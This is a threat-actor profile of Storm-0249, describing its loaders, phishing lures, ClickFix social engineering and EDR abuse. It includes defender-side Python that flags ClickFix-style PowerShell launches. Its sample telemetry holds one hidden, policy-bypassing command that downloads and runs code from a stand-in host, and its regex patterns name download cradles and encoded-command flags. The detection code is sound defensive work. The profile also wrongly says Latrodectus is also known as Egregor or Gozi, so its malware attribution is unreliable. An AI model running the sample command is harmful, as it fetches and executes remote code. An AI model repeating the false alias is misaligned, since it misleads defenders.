Storm-0249 is a cyber threat actor that Microsoft classifies as an initial access broker (IAB) under its “Storm” naming convention for emerging or developing groups.
Active since at least 2021, it specializes in gaining unauthorized entry into victim networks and selling those footholds to other cybercriminals, such as the ransomware operator Storm-0501.
Key Activities and Tactics
• Malware Distribution: Storm-0249 has deployed loaders and malware including BazaLoader, IcedID, Bumblebee, Emotet, and the Latrodectus trojan (also known as Egregor or Gozi). These are often spread via phishing emails with tax-themed lures or fake download sites impersonating legitimate software such as Microsoft tools.
• Phishing and Social Engineering: It has run campaigns timed to seasonal events, such as U.S. tax season, to deliver post-exploitation frameworks like Brute Ratel C4 (BRc4). More recently, it has shifted to hijacked websites and “ClickFix” tactics, in which victims are tricked into running malicious commands on Windows that download the malware themselves.
• Advanced Persistence: In preparation for ransomware, it abuses trusted tools, including endpoint detection and response (EDR) solutions such as SentinelOne, and combines them with fileless PowerShell execution, DLL side-loading, and domain spoofing to maintain stealthy access and evade defenses.
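As an added, defender-side illustration of the ClickFix execution chain described above (example code, not from Microsoft's reporting or the original text), the following Python flags process-creation records in which explorer.exe, the parent of the Windows Run dialog, spawns a script interpreter with hidden-window, encoded, execution-policy-bypass, or download-and-execute arguments. The telemetry records, field names and the example.invalid URL are constructed.

```python
import re
from dataclasses import dataclass

# ClickFix ends with the victim pasting a command into the Run dialog, so the interpreter's
# parent is explorer.exe. That alone is not suspicious; the combination with these flags is.
USER_SHELL_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr|curl|wget)\b"
                                  r"|mshta(\.exe)?\s+https?://", re.I),
}

@dataclass
class ProcessEvent:  # minimal process-creation record (Sysmon Event ID 1 / Security 4688 style)
    parent_image: str
    image: str
    command_line: str

def score_event(ev: ProcessEvent) -> list:
    """Names of indicators matched by one event; [] unless it is the Run-dialog parent/child pattern."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    image = ev.image.rsplit("\\", 1)[-1].lower()
    if parent not in USER_SHELL_PARENTS or image not in INTERPRETERS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]

def detect_clickfix(events, min_indicators: int = 2) -> list:
    """Keep events reaching the threshold. A single indicator (an admin typing
    'powershell -w hidden' into Run) is too noisy to alert on by itself."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= min_indicators:
            flagged.append((ev, hits))
    return flagged

SAMPLE_EVENTS = [  # constructed telemetry; example.invalid is a reserved, non-routable name
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/p)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", "powershell.exe", "powershell Get-Process"),  # admin use
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "powershell.exe", "powershell -w hidden -c Get-Date"),
]

if __name__ == "__main__":
    for ev, hits in detect_clickfix(SAMPLE_EVENTS):
        print(f"ClickFix-like execution: {ev.command_line}  indicators={hits}")
```

Only the first constructed record is flagged; the hidden-window launch from cmd.exe is a different parent chain and falls outside this rule, which is where a separate detection would pick it up.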
Recent Escalations (as of December 2025)
Storm-0249 appears to be evolving from pure access brokering to directly facilitating ransomware, targeting high-value assets such as cryptocurrency wallets and using evasive techniques to bypass defenses. Microsoft first publicly detailed the group in September 2024, and ongoing reports highlight its growing sophistication.
